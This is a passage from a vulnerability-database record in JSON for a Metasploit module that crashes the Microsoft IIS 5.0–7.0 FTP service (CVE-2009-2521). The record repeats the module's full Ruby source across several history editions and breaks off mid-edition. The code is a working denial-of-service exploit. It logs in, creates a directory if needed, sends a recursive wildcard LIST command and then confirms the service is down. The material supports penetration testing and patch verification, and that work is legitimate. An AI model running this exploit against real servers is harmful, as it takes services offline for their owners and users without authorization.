{"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-12-13T11:11:04", "history": [{"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-05-03T20:42:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion", "reporter": "Rapid7", "references": ["#", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html", "http://cvedetails.com/cve/cve-2009-2521", "http://www.microsoft.com/technet/security/bulletin/MS09-053.mspx", "https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx", "http://www.securityfocus.com/bid/36273"], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-07-02T23:39:02", "history": [], "viewCount": 9, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-07-02T23:39:02", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion", "reporter": "Rapid7", "references": ["#", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html", "http://cvedetails.com/cve/cve-2009-2521", "http://www.microsoft.com/technet/security/bulletin/MS09-053.mspx", "https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx", "http://www.securityfocus.com/bid/36273"], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-07-24T20:02:10", "history": [], "viewCount": 17, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-07-24T20:02:10", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-08-21T15:31:11", "history": [], "viewCount": 21, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-08-21T15:31:11", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-17T21:23:30", "history": [], "viewCount": 21, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-17T21:23:30", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-18T05:58:27", "history": [], "viewCount": 22, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-18T05:58:27", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2017-10-22T15:38:35", "history": [], "viewCount": 22, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2017-10-22T15:38:35", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has 